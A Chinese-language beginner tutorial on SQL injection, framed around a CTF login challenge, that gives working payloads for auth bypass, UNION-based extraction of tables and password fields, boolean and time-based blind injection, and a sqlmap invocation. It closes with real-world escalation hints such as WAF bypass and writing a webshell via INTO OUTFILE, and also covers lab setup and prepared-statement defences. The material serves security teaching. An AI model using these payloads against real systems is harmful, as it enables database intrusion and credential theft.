新手也能看懂的SQL注入实战：从‘万能密码’到爆出Flag的完整过程

从登录框到数据库：零基础实战SQL注入通关指南

当你面对一个简单的登录页面，输入用户名和密码点击提交时，系统背后发生了什么？大多数人只关心能否成功登录，而安全研究者却会思考：这个登录框会不会成为入侵整个数据库的入口？SQL注入正是这样一类攻击技术，它利用应用程序对用户输入的不当处理，让攻击者能够执行非预期的SQL命令。本文将带你从最基础的"万能密码"开始，逐步深入理解SQL注入的原理与实战技巧。

1. 初识SQL注入：理解"万能密码"的奥秘

在Web应用开发中，登录功能通常通过查询数据库来验证用户凭据。典型的SQL查询语句可能长这样：

SELECT * FROM users WHERE username='输入的用户名' AND password='输入的密码'

当攻击者在用户名或密码字段插入特殊字符时，就可能改变原始SQL语句的逻辑结构。最经典的"万能密码"攻击就是在密码字段输入' OR '1'='1，这会导致SQL语句变为：

SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'

由于'1'='1'永远为真，整个WHERE条件就会成立，系统可能返回所有用户记录，导致绕过认证。这就是SQL注入的基本原理——通过精心构造的输入改变查询逻辑。

注意：现代Web框架大多内置了防护措施，简单的万能密码可能不再有效，但理解其原理对学习更复杂的注入技术至关重要。

为什么这种攻击能成功？核心问题在于：

• 字符串拼接：开发者直接将用户输入拼接到SQL语句中
• 缺乏参数化查询：没有使用预处理语句来区分代码和数据
• 过度信任用户输入：未对特殊字符进行过滤或转义

2. 搭建实验环境：安全合法的测试平台

在真正尝试SQL注入前，强烈建议在受控环境中练习。以下是几种合法安全的选项：

1. DVWA (Damn Vulnerable Web Application)
   专为安全测试设计的PHP/MySQL应用，包含从低到高的安全等级设置。

2. WebGoat
   OWASP提供的Java版漏洞学习平台，有系统的SQL注入教程。

3. 本地CTF靶场
   下载CTF题目源码在本地运行，如本次演示的"LoveSQL"挑战。

安装DVWA的Docker版本只需一条命令：

docker run --rm -it -p 8080:80 vulnerables/web-dvwa

启动后访问http://localhost:8080，默认账号密码为admin/password。在安全设置中将难度调至"Low"，即可开始注入实验。

3. 实战LoveSQL：从登录绕过到数据泄露

假设我们面对的是一个类似LoveSQL挑战的登录页面，按照以下步骤进行探测：

3.1 初步探测注入点

首先尝试基本的万能密码：

用户名：admin 密码：' OR '1'='1

如果登录成功，说明存在SQL注入漏洞。但现代系统往往有更多防护，我们需要更精确的探测方式。

3.2 确定注入类型和闭合方式

尝试不同的引号组合观察报错：

1. 输入'作为用户名：

   • 如果报错显示SQL语法错误，说明使用单引号闭合
   • 无反应可能使用双引号或其他方式

2. 输入admin'--(注意末尾空格)：

   • 如果登录成功，说明注释符生效
   • --是SQL的单行注释符，会使后续条件失效

3.3 使用UNION查询获取数据库信息

确定存在注入后，通过UNION查询提取数据。首先需要确定列数：

admin' ORDER BY 5--

逐步增加数字直到报错，即可确定列数。假设确定有3列，接下来获取数据库版本和名称：

admin' UNION SELECT 1,version(),database()--

这将返回：

• 数字1作为占位符
• MySQL版本信息
• 当前数据库名称

3.4 提取表名和字段名

通过information_schema数据库获取表信息：

admin' UNION SELECT 1,table_name,table_schema FROM information_schema.tables WHERE table_schema=database()--

找到感兴趣的表(如users)后，获取其字段：

admin' UNION SELECT 1,column_name,data_type FROM information_schema.columns WHERE table_name='users'--

3.5 最终获取Flag

查询目标表中的敏感数据：

admin' UNION SELECT 1,username,password FROM users--

在CTF挑战中，flag可能就藏在某个用户的密码字段里。如果是哈希值，可能需要进一步破解。

4. 防御措施：开发者该如何防护

理解了攻击原理后，作为开发者应该如何防护？以下是最佳实践：

输入验证与处理

• 使用预处理语句(参数化查询)
• 对输入进行严格的白名单验证
• 转义特殊字符(作为最后手段)

权限控制

• 数据库用户使用最小权限原则
• 应用账户不应有DROP、FILE等高危权限

其他措施

• 启用WAF(Web应用防火墙)
• 定期更新数据库和框架
• 错误信息模糊化处理

PHP中使用预处理语句的示例：

$stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username'); $stmt->execute(['username' => $inputUsername]);

5. 进阶技巧：盲注与自动化工具

当页面没有明显错误回显时，需要使用盲注技术：

布尔盲注
通过条件语句的真假推断数据：

admin' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--

时间盲注
利用延时函数判断条件：

admin' AND IF((SELECT password FROM users WHERE username='admin') LIKE 'a%',SLEEP(5),0)--

自动化工具
sqlmap是强大的自动化注入工具，基本用法：

sqlmap -u "http://example.com/login.php" --data="username=admin&password=123" --level=3 --risk=2

但要注意：

• 仅对授权目标使用
• 可能触发WAF封锁
• 理解原理比依赖工具更重要

6. 从CTF到实战：思维方式的转变

CTF题目往往设计明显的漏洞，而真实环境需要更多技巧：

1. 目标识别

   • 寻找可能接触数据库的功能点：搜索、筛选、排序等
   • 注意非传统注入点：HTTP头、文件名等

2. 绕过技巧

   • 编码混淆：十六进制、URL编码
   • 注释变体：/**/代替空格
   • 等价函数替换

3. 权限提升

   • 利用数据库特性读取文件
   • 通过into outfile写入webshell
   • 利用存储过程执行系统命令

真实案例中，一次完整的SQL注入攻击可能涉及多个阶段的精心构造，需要耐心和创造力。